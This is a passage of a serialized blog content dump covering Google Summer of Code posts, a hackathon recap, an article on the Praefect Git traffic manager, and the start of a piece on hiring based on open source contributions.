sponsor at this event and would love to see as many of you at our booth (S1607) to discuss GitLab [Serverless](/topics/serverless/) with Knative and Cloud Run, GitLab’s integration with GKE, GitLab AutoDevOps for CI/CD, Security functionalities, as well as GitLab’s support for GKE On-Prem.\n",[909,1038,109,685,231,9,865,953],{"slug":2798,"featured":6,"template":689},"google-next-post","content:en-us:blog:google-next-post.yml","Google Next Post","en-us/blog/google-next-post.yml","en-us/blog/google-next-post",{"_path":2804,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2805,"content":2810,"config":2816,"_id":2818,"_type":14,"title":2819,"_source":16,"_file":2820,"_stem":2821,"_extension":19},"/en-us/blog/google-summer-of-code-2024-contribute-to-gitlab-and-git-to-prepare",{"title":2806,"description":2807,"ogTitle":2806,"ogDescription":2807,"noIndex":6,"ogImage":1733,"ogUrl":2808,"ogSiteName":673,"ogType":674,"canonicalUrls":2808,"schema":2809},"Google Summer of Code 2024: Contribute to GitLab and Git to prepare","Learning how to contribute to GitLab and Git can help you get ready to apply for Google's program for open source development.","https://about.gitlab.com/blog/google-summer-of-code-2024-contribute-to-gitlab-and-git-to-prepare","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Google Summer of Code 2024: Contribute to GitLab and Git to prepare\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nick Veenhof\"},{\"@type\":\"Person\",\"name\":\"Christian Couder\"}],\n        \"datePublished\": \"2023-12-20\",\n      }",{"title":2806,"description":2807,"authors":2811,"heroImage":1733,"date":2813,"body":2814,"category":10,"tags":2815},[2812,1492],"Nick Veenhof","2023-12-20","Google Summer of Code ([GSoC](https://summerofcode.withgoogle.com/)), a program that helps bring new contributors into open source software development, is just around the corner. So now is the time to start learning [how to contribute to GitLab](https://about.gitlab.com/community/contribute/) or Git and prepare ideas for GSOC 2024. GitLab has participated in GSOC for more than five years of the program's 20-year history, and the mentorship opportunity aligns well with our \"[Everyone can contribute](https://handbook.gitlab.com/handbook/company/mission/)\" mission.\n\nIn 2023, GitLab team members mentored GSoC contributors working on GitLab and Git open source projects throughout the 12-week program. One example was the “Unify ref-filter formats with other --pretty formats” Git project. \n\n## Implementing new formatting options for Git commands\n\nKousik Sanagavarapu was selected as a 2023 GSOC contributor and was mentored by [Christian Couder](https://gitlab.com/chriscool), staff backend engineer on the GitLab Gitaly::Git team.\n\nKousik’s work focused on implementing some [new formatting options for Git commands](https://summerofcode.withgoogle.com/programs/2023/projects/rck3kmq2) like `git branch`, `git tag` and `git for-each-ref`. These commands use a formatting mechanism called the “ref-filter” format. The formatting options Kousik worked on were already available for other commands like `git log`, that use a different formatting mechanism called the “pretty” format. So the work involved porting these options from the “pretty” format to the “ref-filter” format.\n\nThanks to Kousik’s work, it’s now possible to use a number of new placeholders like %(signature), %(authoremail:mailmap), or %(describe) in the –format option of `git branch`, `git tag`, and `git for-each-ref` to get more information about the commits that branches, tags, or refs in general point to. [Read the documentation](https://git-scm.com/docs/git-for-each-ref/2.43.0#_field_names) for a description of these placeholders.\n\nThese improvements are available in the recently released Git 2.43.\n\n## How GSOC works\n\nOpen source organizations who participate – such as GitLab and Git – have to propose projects and provide mentors. Selected contributors are helped by the mentors and paid by Google during 12 or more weeks while they work on their projects. Contributors are evaluated three times by mentors: after a “Community Bonding” period, in the middle of the coding period, and after the coding period for a final evaluation.  \n\n## How to participate as a contributor\n\nTo apply to become a contributor for GSOC 2024, check out the [GSoC website](https://summerofcode.withgoogle.com/) and the [Google Open Source blog](https://opensource.googleblog.com). Interested parties should register [when selected organizations are announced](https://opensource.googleblog.com/2023/02/mentor-organizations-announced-for.html), which will happen in a few months. \n\nContributors will then be selected by the mentors after they have made a small contribution and after they have prepared an application document that details how they plan to achieve the proposed project they want to work on.\n\nProspective contributors can start learning about GitLab or Git right now to be fully ready to make a small contribution and prepare an application. [As Google says](https://opensource.googleblog.com/2023/02/mentor-organizations-announced-for.html), “The most successful applications come from contributors who start preparing now.” \n\nGitLab has a lot of documentation and tutorials [to learn how to contribute](https://about.gitlab.com/community/contribute/), while Git has a [Hacking Git page](https://git.github.io/Hacking-Git/) with a lot of helpful links.\n\n## How GitLab team members participate\n\nGitLab participates in GSOC as an open source organization and team members from different functional areas volunteer to mentor contributors and propose projects for them to work on.  \n\nIn 2023, GitLab team members mentored contributors on a number of GitLab-related projects, including  Pajamas Migration with the GitLab Foundations Team and improving the documentation for the contributor journey to GitLab.\n\n## How Git developers participate\n\nThe Git project also participates in GSoC as an open source organization, and Git developers who are interested in mentoring propose projects, and then select GSoC contributors.\n\nLast summer, in addition to the \"Unify ref-filter formats with other --pretty formats\" project, Git developers proposed the \"[More Sparse Index integrations](https://summerofcode.withgoogle.com/programs/2023/projects/Rkbc1Abe)\" project.\n\n## Mentoring and GitLab \n\nGitLab’s mission is “Everyone can contribute” and we understand that helping potential contributors through mentoring can achieve this goal. In addition to participating in external programs like GSOC and [Outreachy](https://about.gitlab.com/blog/outreachy-sponsorship-winter-2020/), GitLab has internal mentoring programs, including a [CEO Shadow program](https://handbook.gitlab.com/handbook/ceo/shadow/) and a [Mentorship program for women](https://handbook.gitlab.com/handbook/company/culture/inclusion/tmrg-gitlab-women/mentorship-program/).\n\nLearn more about [mentoring at GitLab](https://handbook.gitlab.com/handbook/people-group/learning-and-development/mentor/).",[9,267,708,751,779],{"slug":2817,"featured":6,"template":689},"google-summer-of-code-2024-contribute-to-gitlab-and-git-to-prepare","content:en-us:blog:google-summer-of-code-2024-contribute-to-gitlab-and-git-to-prepare.yml","Google Summer Of Code 2024 Contribute To Gitlab And Git To Prepare","en-us/blog/google-summer-of-code-2024-contribute-to-gitlab-and-git-to-prepare.yml","en-us/blog/google-summer-of-code-2024-contribute-to-gitlab-and-git-to-prepare",{"_path":2823,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2824,"content":2830,"config":2836,"_id":2838,"_type":14,"title":2839,"_source":16,"_file":2840,"_stem":2841,"_extension":19},"/en-us/blog/gsoc-at-gitlab",{"title":2825,"description":2826,"ogTitle":2825,"ogDescription":2826,"noIndex":6,"ogImage":2827,"ogUrl":2828,"ogSiteName":673,"ogType":674,"canonicalUrls":2828,"schema":2829},"Google Summer of Code at GitLab – some intern highlights","GitLab team members mentored student interns and helped them develop open source projects during Google Summer of Code.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682129/Blog/Hero%20Images/gsoc_cover.jpg","https://about.gitlab.com/blog/gsoc-at-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Google Summer of Code at GitLab – some intern highlights\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Aakriti Gupta\"}],\n        \"datePublished\": \"2021-09-01\",\n      }",{"title":2825,"description":2826,"authors":2831,"heroImage":2827,"date":2833,"body":2834,"category":299,"tags":2835},[2832],"Aakriti Gupta","2021-09-01","\n\nGitLab participated in [Google Summer of Code](https://summerofcode.withgoogle.com/) for the first time this year. We hosted four student interns to work with us on four different projects under the supervision of two or three mentors each.\n\nFor the past 16 years, Google has hosted the Summer of Code to introduce students to the world of open source. Over the summer, student interns work on a project with an open source organization and are closely mentored by the developers of the open source project. More than [200 organizations](https://summerofcode.withgoogle.com/organizations/) participated this year.\n\nWe started off the summer with a two-week long community bonding period to get our students familiar with how we work at GitLab and helped them set-up their local development environments. During the 10-week program we worked through scoped projects with regular check-ins and [a final demo](https://youtu.be/--Neg5pwwnI) to conclude the program.\n\n## Meet the students\n\n### Alejandro Rusi\n[Alejandro](https://gitlab.com/rusi-ruse), a CS student from Argentina, worked on [enabling Courseware as Code](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/gitlab-gsoc-2021/-/issues/4) through his project. Check out his [video presentation here](https://youtu.be/qgQQ4MgnKR4) and read [more about the project here](https://alejandro-rusi.gitlab.io/2021/05/31/toward-courseware). Alejandro said:  \n\n> They quickly made me feel welcome and part of Gitlab. All of the topics to choose from were very interesting, and all mentors seemed great.\n>\n> I would like to highlight a moment during GSoC where I wasn't able to do my normal workload due to a personal problem, and my mentors where incredibly supportive and understanding.\n\n### Anshuman Singh\n\n[Anshuman](https://gitlab.com/singhanshuman), a CS student who joined us from India, collaborated with the Static Analysis team to work on [writing vulnerability detection rules  for SAST](https://gitlab.com/groups/gitlab-org/-/epics/6089). Anshuman said: \n\n> For a beginner, it is normal to feel insecure about achieving specified tasks in your group.\n>\n> I am glad that my mentors Julian and Ross were there at every step of the program to provide support and clear my doubts about anything. It was such an enriching experience for me. I am glad to be the part of GitLab for this Google Summer of Code edition. :)\n\n### Cyrine Gamoudi\n\nA computer engineering student from Tunisia, [Cyrine](https://gitlab.com/CyrineG1) worked with the Static Analysis team on [porting SAST and Secret Detection rails platform code to GitLab CE](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/gitlab-gsoc-2021/-/issues/6).\n\n> The project went very smoothly. I was able to achieve almost all of the planned milestones and I'm currently still in contact with my mentors, working on what was left. I enjoyed getting an inside look into how open source projects are maintained as well as how they evolve through time. It was also interesting to see the impact of historical architectural decisions on what could and could not be done later on.\n\n### Shubham Kumar\n\nNow in his final year of schooling, [Shubham](https://gitlab.com/imskr) from India helped the Geo team [improve our backup and restore features](https://shubhamkumar.live/blog/Improving-Backup-and-Restore-For-GitLab-GSoC-2021/).\n\n> Mentorship was amazing. Mentors helped me a lot whenever I had problem. Contributing to GitLab is very welcoming. I absolutely loved it.\n\n## GitLab mentors share their thoughts \n\n### What went well?\n\n- External organization\n  - The folks at Google were well organized, the entire schedule was available right at the beginning and the reminder emails were very informative and well timed.\n  - We used it to create our own calendar and that was very helpful.\n- Asynchronous working style\n\n> Having recorded meetings and an agenda doc was really helpful, especially for cases where one mentor went on holidays it was easy to catch up on things. Writing up a planning epic with our student Anshuman was really helpful to make sure that we were on the same page and to clearly define the project deliverables. - [Julian Thome](/company/team/#julianthome), senior vulnerability research engineer at GitLab. \n>\n> Related to this, GitLab's default mode of working that favors asynchronous communication and the written form feels very well-aligned with GSoC and working across time zones. Even without a large amount of overlap between working for myself and our mentee, it felt very effective and like we had a strong foundation in place to support communication and workflows (just point to our existing handbook and docs). - [Lucas Charles](/company/team/#theoretick), staff backend engineer, Secure, at GitLab.\n\n  - It was really useful to have two mentors on the project. This way it was easier sharing responsibilities and managing other priorities, especially when one mentor was out.\n\n### What could be improved? \n\n- We had considerable engagement on the project proposal issues but not as many applications.\n- GitLab is huge and a complex object model for students to hold onto.\n- Running GitLab locally requires a lot of resources.\n- The fork contribution model wasn't efficient for some projects.\n\n\n- Define the required skills for the project better\n> Since GSoC is 10 short weeks, making sure that the student has acquired all the required skills for the project before it starts would have allowed us to reduce the overall mentoring workload and to use mentoring time more efficiently by focusing on the project objectives. Next year, we can make better use of the \"Community Bonding\" period by giving the students more guidance and some time upfront to learn the required technologies/languages so that they are fully prepared before the coding phase begins. -  Julian\n\n- A clear \"victory task,\" possibly in the frontend, would have made some of the projects more \"visible\" and would have felt more complete.\n\n## Wrapping up\n\n[Tetiana Chupryna](/company/team/#brytannia), senior backend engineer, Secure, at GitLab sums up the experience of the mentors really well: \n\n> This program gave me a feeling of deep fulfilment as I was able to look at GitLab through the eyes of a community contributor and I hope that this project was useful for our student in her career, and she will return to GitLab one day as a contributor (we were lucky to have her on this project). So it was a summer well spent 🍎.\n\nWe hope GitLab can be back at Google Summer of Code next year!\n\n[Cover image](https://unsplash.com/photos/7RQf2X6aXXI) by [Raphaël Biscaldi](https://unsplash.com/@les_photos_de_raph)\n{: .note}\n\n",[267,708,780,9,2660],{"slug":2837,"featured":6,"template":689},"gsoc-at-gitlab","content:en-us:blog:gsoc-at-gitlab.yml","Gsoc At Gitlab","en-us/blog/gsoc-at-gitlab.yml","en-us/blog/gsoc-at-gitlab",{"_path":2843,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2844,"content":2849,"config":2854,"_id":2856,"_type":14,"title":2857,"_source":16,"_file":2858,"_stem":2859,"_extension":19},"/en-us/blog/hackathon-recap",{"title":2845,"description":2846,"ogTitle":2845,"ogDescription":2846,"noIndex":6,"ogImage":1348,"ogUrl":2847,"ogSiteName":673,"ogType":674,"canonicalUrls":2847,"schema":2848},"Recapping the first GitLab Hackathon","What we accomplished and learned from the Hackathon on September 27-28.","https://about.gitlab.com/blog/hackathon-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Recapping the first GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-10-09\",\n      }",{"title":2845,"description":2846,"authors":2850,"heroImage":1348,"date":2851,"body":2852,"category":10,"tags":2853},[704],"2018-10-09","\n\nWhen we wrapped up our first Hackathon on September 28th, I was impressed both\nwith the energy from participants (including many first-time contributors) and\nwhat the GitLab community accomplished over two days.\n\n## So what did we accomplish?\n\nOne of the key goals of the event was to encourage community members to contribute\nMerge Requests (MRs), and the community delivered more than 20 MRs, with 15 of\nthem merged as of October 8th. You can see the list of MRs at the\n[Hackathon Community MRs page](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/issues/4).\nThis is pretty impressive when you consider that community members had a less than\n2-weeks notice for the event.\n\n## What else happened during the event?\n\nIn addition to hacking, we had several community experts deliver tutorial\nsessions on topics ranging from\n[GitLab Development Kit](https://www.youtube.com/watch?v=gxn-0KSfNaU),\n[documentation](https://www.youtube.com/watch?v=8GT2XOkpSi4&feature=youtu.be),\n[internationalization/translation](https://www.youtube.com/watch?v=LJ9oSSx0qyY&feature=youtu.be),\n[UX design](https://www.youtube.com/watch?v=q_nq5OCiktE&feature=youtu.be), and\n[Merge Request Coaches](https://www.youtube.com/watch?v=daCFv9tAQXw&feature=youtu.be).\nRecordings/slides from all the sessions can also be found on the [Hackathon wiki page](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/wikis/Q3%272018-hackathon).\nWe also identified a number of issues/bugs as listed on the [wiki](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/wikis/Q3%272018-hackathon#issuesbugs-found-during-the-hackathon),\nand we will certainly be following up on these.\n\n## Will there be another Hackathon event in the future?\n\nOur plan is to have a Hackathon event every quarter, and I'm excited to announce\nthat the Q4 Hackthon will take place on November 14-15. Stay tuned for further\nannouncements in another blog post and discussions on the\n[GitLab Community room in Gitter](https://gitter.im/gitlabhq/community)\nand on the [GitLab forum](https://forum.gitlab.com/). In addition,\nif you have any suggestions for topics and/or feedback on last month's event,\nplease mention them on the [GitLab Community room in Gitter](https://gitter.im/gitlabhq/community)\nto help us improve future Hackathons.\n\n## Hackathon prizes\n\nAs we announced at the Hackathon kickoff, everyone who had MRs merged will\nreceive a token of our appreciation so they can purchase GitLab merchandise at\nthe [GitLab store](https://shop.gitlab.com/). During the Hackathon period,\neight people had MRs merged and the \"grand prize\" winner with most MRs merged is\n[George Tsiolis](https://gitlab.com/gtsiolis) with seven merged MRs!\nCongratulations to everyone! I will reach out to all winners shortly.\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\nCover image: [\"Gitlab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel).\n{: .note}\n",[267,779,9,277],{"slug":2855,"featured":6,"template":689},"hackathon-recap","content:en-us:blog:hackathon-recap.yml","Hackathon Recap","en-us/blog/hackathon-recap.yml","en-us/blog/hackathon-recap",{"_path":2861,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2862,"content":2868,"config":2874,"_id":2876,"_type":14,"title":2877,"_source":16,"_file":2878,"_stem":2879,"_extension":19},"/en-us/blog/high-availability-git-storage-with-praefect",{"title":2863,"description":2864,"ogTitle":2863,"ogDescription":2864,"noIndex":6,"ogImage":2865,"ogUrl":2866,"ogSiteName":673,"ogType":674,"canonicalUrls":2866,"schema":2867},"Meet Praefect: The traffic manager making your Git data highly available","This router and transaction manager ensures there are multiple copies of each Git repository available in the event of an outage – no NFS required.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749669204/Blog/Hero%20Images/traffic-intersection.jpg","https://about.gitlab.com/blog/high-availability-git-storage-with-praefect","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Meet Praefect: The traffic manager making your Git data highly available\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Zeger-Jan van de Weg\"}],\n        \"datePublished\": \"2021-01-21\",\n      }",{"title":2863,"description":2864,"authors":2869,"heroImage":2865,"date":2871,"body":2872,"category":801,"tags":2873},[2870],"Zeger-Jan van de Weg","2021-01-21","\nAs critical software projects grow, scaling infrastructure to make the service [highly available](https://en.wikipedia.org/wiki/High_availability) is key. At GitLab, our biggest struggle in scaling was right in our name: Git.\n\n## The trouble with scaling Git\n\nGit is software that is distributed, but not usually run in a ‘highly available cluster,’ which is what GitLab needs. At first, we solved this with a [boring solution](https://handbook.gitlab.com/handbook/values/#boring-solutions), NFS – which exposes a shared filesystem across multiple machines and generally worked. As we’d soon find out, most NFS appliances were for bulk storage and not fast enough. This led to problems with GitLab’s Git access being slow.\n\nTo solve the speed problem we built [Gitaly, our service that provides high-level RPC access to Git repositories](https://docs.gitlab.com/ee/administration/gitaly/). \n\nWhen we started with [Gitaly v1.0](/blog/the-road-to-gitaly-1-0/), our goal was to remove the need for a network-attached filesystem access for Git data. When that was complete, the next problem to tackle was that all your data is only stored once. So, if you have a server down, or your hard disk dies, or something happens to this one copy, you're in deep trouble until a backup is restored. This is an issue for GitLab.com, but it’s also a big risk for our customers and community.\n\nBack at our [Summit in Cape Town](/company/culture/contribute/previous/#summit-in-cape-town-south-africa) in 2018, the Gitaly team (at the time, that was [Jacob Vosmaer](/company/team/?department=all#jacobvosmaer-gitlab) and me) and some other engineers discussed pursuing a fault-tolerant, highly available system for Git data. For about a month we went back and forth about how we would go about it – ranging from wild ideas to smaller iterations towards what we want. The challenge here was that the ultimate aim is always going to be 100% availability, but you’re never going to make that. So let's aim for a lot of nines (three nines being 99.9%, five being 99.999%, etc.) Ideally, we'd be able to iterate to 10 nines if we wanted to. \n\nEventually we chose the design of a proxy: introduce a new component in the GitLab architecture, which is Praefect, and then route all the traffic through it to Gitaly storage nodes to provide a [Gitaly Cluster](https://docs.gitlab.com/ee/administration/gitaly/praefect.html). Praefect inspects the request and tries to route it to the right Gitaly backend, checks that Gitaly is up, makes sure the copies of your data are up to date, and so on. \n\n## First iteration: Eventual consistency\n\nTo cut the scope, for our first iterations we settled on eventual consistency, which is fairly common – we even use it for some GitLab features. With Git data, if we are behind a minute, it's not a big deal because at GitLab at least 90% of operations on our Git data are just reads, compared to a very small volume of writes. If I run `git pull` and I'm one commit behind master, that's not ideal, but not a deal breaker in most cases. \n\nWith eventual consistency, each repository gets three copies: one primary and two secondary. We replicate your data from the primary to the other copies, so that if your primary is inaccessible, we can at least give you read access to the secondary copies until we recover the primary. There’s a chance the secondaries are one or two commits behind your primary, but it’s better than no access.\n\nWe rolled this out in [13.0](/releases/2020/05/22/gitlab-13-0-released/#gitaly-cluster-for-high-availability-git-storage) as generally available. \n\n## Strong consistency\n\nThe next stage was to work on strong consistency, where all of your three copies are always up to date. \n\nWhen you write to your Git repository, there’s a moment where Praefect says, “OK, I'm going to update branch A from #abc to #cbd.” If all three copies agree on the updates, then Praefect tells everyone to apply this update and now, almost at the same moment in time, they'll update the data to the same thing. Now you've got three copies that are up to date.\n\nSo, if one copy is offline for some reason – let’s say a network partition, or the disk is corrupted – we can serve from the other two copies. Then the data remains available, and you have more time to recover the third copy as an admin. Effectively, while you always have a designated primary, it's actually more like having _three_ primaries, because they are all in the same state. \n\nIf the default state of a system is consistent it requires maintaining this consistency on each mutation to the data that's performed. All possible requests to Gitaly are grouped into two classes: mutators and accessors. Meaning that there was a risk we had to migrate each mutator RPC individually. That would've been a major effort, and if possible, we wanted to push this problem to Git. Gitaly uses Git for the majority of write operations, and was thus the largest common denominator.\n\nSo Git had to become aware of transactions, which ideally isn't part of Git. There are more areas where it would be nice if Git was aware of business logic, but if we're honest with ourselves, it's not really Git's concern: authentication and authorization. At GitLab we use [Git Hooks](https://git-scm.com/docs/githooks.html#_hooks) for that. So the idea [applied and contributed](https://public-inbox.org/git/1de96b96e3448c8f7e7974f7c082fd08d2d14e96.1592475610.git.ps@pks.im/T/#m9ae42f583968aa1d8ca43bd3007333cf51a618cc) (thanks, [Patrick Steinhardt](/company/team/#pks-gitlab)!) was the same: when events happen with Git, execute a hook and allow Gitaly to execute business logic. Through the exit code of the hook, Git is signaled on how to proceed. In Git, these events are updates of any reference (for example, branches or tags). When this happens Git will then allow Gitaly to participate in a [three-phase commit](https://en.wikipedia.org/wiki/Three-phase_commit_protocol) transaction by communicating back to Praefect, and enforce consistency. So we got that released in Git, fixed a bug, and now we’re [rolling it out to almost all write requests](https://gitlab.com/gitlab-org/git/-/issues/79).\n\n## A defensible cost increase\n\nNow strong consistency is great, but we are effectively asking our customers, “Instead of one copy, why don't you triple your storage costs and your server costs and whatnot, and you have zero benefits unless something goes wrong.” That wasn't really appealing for most customers, but now we’ve sweetened the deal with increased performance and making the cost increase more manageable. \n\nSo, if you have three copies of your data that are up to date, then all of them could serve any request that doesn't mutate the data, right? Because you know they're up to date. Right now, [Pavlo](/company/team/?department=gitaly-team#8bitlife) is working on [read distribution, which we are making generally available in 13.8](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/71960) (coming Jan. 22, 2021). [We rolled it out briefly before](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/58694), but it didn’t scale as expected, so we’ve worked with QA to mitigate that.\n\nRight now, Praefect is rolled out to a very limited subset of projects on GitLab.com, because running it is expensive already. When I first proposed rolling it out for everyone, it was very quick to calculate that that will triple our Gitaly Clusters – not within the budget at all! So we're trying to iterate towards that goal. The first step is to work on allowing a [variable replication factor](https://docs.gitlab.com/ee/administration/gitaly/praefect.html#variable-replication-factor). It can be expensive to store a lot of data multiple times, so why don't we make it so that you can store some repositories three times and some just one time, and you don't get the guarantees and the availability of those with three copies.\n\n## Challenges and lessons learned\n\nSo we have Praefect, this new component, but it's not installed by default on GitLab Omnibus –\nyou have to enable it yourself. The [GitLab Development Kit](https://gitlab.com/gitlab-org/gitlab-development-kit) uses it as well as the tests on GitLab.com, for GitLab projects, but that wasn’t always the case. When you have an optional part in your architecture, if you’re debugging or talking with customers, there is the additional mental burden of verifying what the architecture looks like. Without it, you can make much quicker assumptions on what's going on and why it's working or why it isn't. Officially, we have deprecated NFS, so it makes sense to make it a required component so we can depend on it being there.\n\nAlso, as we add more features to Praefect, if it’s still optional then some customers get those added benefits and some don’t.\n\n### We should have put it in production sooner\n\nOur first iteration was just proxying the traffic, doing nothing with it, and verifying that it works. We didn't put it in production because it offered nothing to the community. But, it includes new components in your architecture, which our SREs need to know about, and there were a couple of bugs we found out much later. I was hesitant to put something in production that didn't offer anything in return, but if we’d been a little more aggressive with putting it out there – even just for a small subset of projects – we would understand more quickly what we're running, what was working, and what wasn't. \n\n### Applying big architectural changes takes time\n\nIf you ask customers to make giant architectural changes, it's going to take longer than you think. When we released Praefect and Gitaly Clusters in 13.0, it was fairly rough around the edges and some things weren't working as you would expect, but it was a good time to release because now, six months later, we see customers finally starting to implement it. They want to validate, try it out on a subset, and then finally roll it out for their whole GitLab instance. While that took longer than I expected, it's cool to see the numbers going up now, and adoption is growing quite rapidly.\n\n## More than just a traffic manager\n\nPraefect does much more than just inspect the traffic. If Gitaly goes down, ideally you want to notice that before you actually fire a request, which Praefect does. It does failover, so if one fails and it was designated as a primary, then it fails over to a secondary, which is now designated as a primary. \n\nI'm really excited for the next few years and the kind of things we are planning to build in Praefect and what that will deliver to GitLab.com and our customers and community. Where before we didn’t have very granular control over what we were doing or why we were doing it, now we can intercept and optimize.\n\n## What's next\n\nWe're shipping [HA Distributed Reads](https://gitlab.com/gitlab-org/gitaly/-/issues/3334) in GitLab 13.8 (Jan. 22, 2021). For 13.9, we're shooting for [strong consistency in the Gitaly Cluster](https://gitlab.com/groups/gitlab-org/-/epics/1189) and [variable replication factor](https://gitlab.com/groups/gitlab-org/-/epics/3372).\n\nFor GitLab self-managed users, consider enabling Praefect if you have high availability requirements. Visit our [Gitaly Clusters documentation](https://docs.gitlab.com/ee/administration/gitaly/praefect.html) to get started.\n\n_Major thanks to [Rebecca Dodd](/company/team#rebecca) who contributed to this post._\n\nCover image by [Yoel J Gonzalez](https://unsplash.com/@yoeljgonzalez?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText\") on [Unsplash](https://unsplash.com/s/photos/traffic?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText)\n{: .note}\n",[953,751,803,231,9],{"slug":2875,"featured":6,"template":689},"high-availability-git-storage-with-praefect","content:en-us:blog:high-availability-git-storage-with-praefect.yml","High Availability Git Storage With Praefect","en-us/blog/high-availability-git-storage-with-praefect.yml","en-us/blog/high-availability-git-storage-with-praefect",{"_path":2881,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2882,"content":2888,"config":2893,"_id":2895,"_type":14,"title":2896,"_source":16,"_file":2897,"_stem":2898,"_extension":19},"/en-us/blog/hiring-based-on-open-source-contributions-could-be-harmful",{"title":2883,"description":2884,"ogTitle":2883,"ogDescription":2884,"noIndex":6,"ogImage":2885,"ogUrl":2886,"ogSiteName":673,"ogType":674,"canonicalUrls":2886,"schema":2887},"We all love open source, but hiring based on contributions could be harmful","An industry expert from Indeed says it's a bad idea to make hiring decisions based on GitHub activity.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678750/Blog/Hero%20Images/man-coding.jpg","https://about.gitlab.com/blog/hiring-based-on-open-source-contributions-could-be-harmful","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We all love open source, but hiring based on contributions could be harmful\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Aricka Flowers\"}],\n        \"datePublished\": \"2018-11-16\",\n      }",{"title":2883,"description":2884,"authors":2889,"heroImage":2885,"date":2890,"body":2891,"category":10,"tags":2892},[2071],"2018-11-16","\nThere’s been a lot of chatter about using open source contributions as a metric in the hiring process. After some intense discussions on social media, Ashe Dryden, a programmer and diversity advocate and consultant, [wrote about the ethical problems with hiring based on GitHub activity and open source contributions](https://www.ashedryden.com/blog/the-ethics-of-unpaid-labor-and-the-oss-community) back in 2013, and the topic resurfaces every few months.\n\nMost recently, [@ReBeccaOrg](https://twitter.com/ReBeccaOrg/status/954081973814755328) and [@Joemccann](https://twitter.com/joemccann/status/1004798006485573632) kicked up more discussion with their respective tweets, inspiring the head of open source at job site [Indeed.com](https://www.indeed.com/about), Duane O'Brien, to take it to the next level with a conference talk.\n\n\"This talk was inspired by a discussion from earlier in the year about a startup that tried to create a ranking algorithm to identify job candidates based solely on their GitHub activity,\" he explains. \"In fact, between the time that I started putting together the talk and the first time that I gave it, the topic had blown up on Twitter again because someone else had started talking about how they don't even look at resumes anymore, they just look at GitHub profiles. People were pointing out why this is problematic.\"\n\n### 1. It creates an uneven playing field\n\nWhile hiring based on GitHub profiles is not a universal practice, Duane says it has been going on for a while. He says the practice can inadvertently create bias.\n\n\"A problem with biasing your hiring process toward people who have a history of open source work is that it is likely you're expecting that they've done it in their free time\u003Csup>(1)(2)\u003C/sup>. And the demographic that historically has the most available free time [trends towards male](https://www.unece.org/info/media/news/statistics/2016/how-much-free-time-do-we-have/doc.html),\" he says. \"Because of this, there can be an unexpected effect of filtering out people who are primary caregivers or young parents, or people who are making a career transition and have to work two jobs, those who bear disproportionate household responsibilities, and so on.\"\n\n### 2. It plays up a sometimes unattainable standard\n\nAnother concern for critics of open source contribution-focused hiring is that it can perpetuate this mantra that you have to be coding nonstop to be considered a real developer.\n\n\"There's [this perception](https://www.codementor.io/@codementorteam/how-to-get-your-first-developer-job-even-if-you-don-t-have-a-cs-degree-8b60y8ch2), especially in Silicon Valley, that [if you are not eating, breathing, and sleeping code](https://www.businessinsider.com/why-one-programmer-hates-the-popular-eat-sleep-code-repeat-t-shirt-2016-5) at work and during all your spare time and don't have a bunch of [personal side projects](https://insights.dice.com/2013/11/15/improve-chance-landing-job-personal-project/), that you don't take it seriously or are [not as desirable of a candidate](https://techbeacon.com/what-do-job-seeking-developers-need-their-github) as someone who does spend all their time on coding,\" Duane says. \"I think that places an unfair claim on people's free time, and what they should be doing with it. Especially those with families. Most people expect flexibility and wouldn’t want to work for an employer who has unrealistic expectations.\"\n\n### Open source's place in hiring\n\nOpen source participation does have a role in hiring, but it should not be the be-all and end-all for a candidate. If you’re looking for someone who has experience working within a particular open source community or project, then it makes sense to look at the open source contributions of job candidates, O’Brien said. But in most cases, there are other ways to evaluate applicants and also keep the playing field even.\n\n\"If you're looking to hire for an engineering position and you've got two engineers, one of whom has a robust history of working in open source, and one of them who doesn't have any open source footprint at all, rather than automatically interpreting one candidate as less desirable than the other, I recommend finding another way to get a look at their skills,\" Duane advised. \"You can do that by asking them for code samples, or having them do panel interviews or take-home assessment-based assignments. Some companies are also offering contract work to potential candidates as a way to try them out on the job. Honeycomb.io has done some of this.\u003Csup>(3)\u003C/sup> This ‘hiring in production’ mentality seems to be emerging as a practice.\"\n\n### Suggestions for job hunters\n\nJob seekers who have little to no open source experience should be prepared for questions about their lack of participation. Be straightforward about your constraints, be it a lack of time, interest or opportunity, and offer code samples that allow employers to view your skills in action. Duane says it is also important to interview your potential employer to make sure their expectations are in line with your wants and 